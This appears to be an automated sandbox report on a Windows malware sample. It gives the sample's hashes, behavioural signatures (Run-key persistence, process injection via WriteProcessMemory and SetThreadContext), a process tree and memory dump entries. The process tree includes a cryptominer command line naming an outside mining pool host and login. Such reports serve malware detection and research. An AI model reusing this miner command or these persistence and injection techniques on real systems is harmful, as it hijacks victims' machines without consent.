Analysis

  • max time kernel
    189s
  • max time network
    232s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/12/2022, 10:26

General

  • Target

    eea5e9b290232b76c08bf3695960c986e442a036c15283734f46d19ad673aeb3.exe

  • Size

    396KB

  • MD5

    a0c882ff03eae31876a393b4ac3c0f01

  • SHA1

    246d7ff14b440fecf81b04a3ff78e6dd20cd6bea

  • SHA256

    eea5e9b290232b76c08bf3695960c986e442a036c15283734f46d19ad673aeb3

  • SHA512

    a817cdb80d8f7d0a9b14f93c5d39a9a0498c84adb5877a012d69396921f16da8e7d4ac238e80bd1e0e590e07d68a011e4a9f125cc87a41886b0a8957664f7b08

  • SSDEEP

    6144:BWxe0qY/+Xf/BTj6fLntAnDJgQ47nw9OpNW8rABQ:EQ0qY2Xf/Bgt2DXIngOq

Score
8/10

Malware Config

Signatures

  • Adds policy Run key to start application 2 TTPs 4 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\eea5e9b290232b76c08bf3695960c986e442a036c15283734f46d19ad673aeb3.exe
    "C:\Users\Admin\AppData\Local\Temp\eea5e9b290232b76c08bf3695960c986e442a036c15283734f46d19ad673aeb3.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2960
    • C:\Users\Admin\AppData\Local\Temp\eea5e9b290232b76c08bf3695960c986e442a036c15283734f46d19ad673aeb3.exe
      "C:\Users\Admin\AppData\Local\Temp\eea5e9b290232b76c08bf3695960c986e442a036c15283734f46d19ad673aeb3.exe"
      2⤵
      • Adds policy Run key to start application
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:1812
      • C:\Users\Admin\AppData\Local\Temp\eea5e9b290232b76c08bf3695960c986e442a036c15283734f46d19ad673aeb3.exe
        miner.exe -a 60 -g yes -o http://xxxvideos.sso9523.com:8332/ -u p0rnstar_worker -p ornelia
        3⤵
          PID:4060

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1812-135-0x0000000000400000-0x000000000043B000-memory.dmp

      Filesize

      236KB

    • memory/1812-137-0x0000000000400000-0x000000000043B000-memory.dmp

      Filesize

      236KB

    • memory/1812-138-0x0000000000400000-0x000000000043B000-memory.dmp

      Filesize

      236KB

    • memory/4060-140-0x0000000000400000-0x0000000000537000-memory.dmp

      Filesize

      1.2MB

    • memory/4060-142-0x00000000004FD000-0x0000000000537000-memory.dmp

      Filesize

      232KB

    • memory/4060-141-0x00000000004FD000-0x0000000000537000-memory.dmp

      Filesize

      232KB

    • memory/4060-143-0x0000000000400000-0x0000000000537000-memory.dmp

      Filesize

      1.2MB

    • memory/4060-144-0x0000000000400000-0x00000000005368DA-memory.dmp

      Filesize

      1.2MB

    • memory/4060-145-0x0000000000400000-0x00000000005368DA-memory.dmp

      Filesize

      1.2MB

    • memory/4060-147-0x0000000000400000-0x00000000005368DA-memory.dmp

      Filesize

      1.2MB

    • memory/4060-146-0x0000000000400000-0x00000000005368DA-memory.dmp

      Filesize

      1.2MB

    • memory/4060-149-0x0000000002400000-0x0000000002405000-memory.dmp

      Filesize

      20KB

    • memory/4060-150-0x0000000002360000-0x00000000023AB000-memory.dmp

      Filesize

      300KB